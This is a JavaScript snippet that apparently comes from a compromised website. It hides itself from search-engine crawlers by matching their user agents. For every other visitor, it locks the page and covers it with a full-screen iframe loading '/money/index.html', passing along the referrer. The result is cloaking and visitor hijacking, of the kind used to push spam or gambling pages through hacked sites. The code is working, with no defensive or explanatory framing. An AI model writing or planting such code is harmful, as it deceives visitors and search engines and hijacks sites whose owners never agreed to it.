var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i;
if (!reg.test(navigator.userAgent)) {
    var referrer = document.referrer;
    if (!referrer) {
        try {
            if (window.opener) {
                referrer = window.opener.location.href
            }
        } catch (e) { }
    }
    _src = '/money/index.html';
    var ss = _src + '?ref=' + referrer;
    document.write('<meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1">');
    var hd = document.head;
    var styleCSS = document.createElement('style'), kflaodi = document.createElement('div');
    styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.kflaodi{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}';
    kflaodi.setAttribute('class', 'kflaodi');
    kflaodi.innerHTML = '<iframe src=' + ss + ' frameborder="0" style="position:fixed;top:0;left:0;width:100% !important;height:100% !important;max-height: none !important;"></iframe>';
    hd.appendChild(styleCSS);
    hd.parentNode.appendChild(kflaodi);
}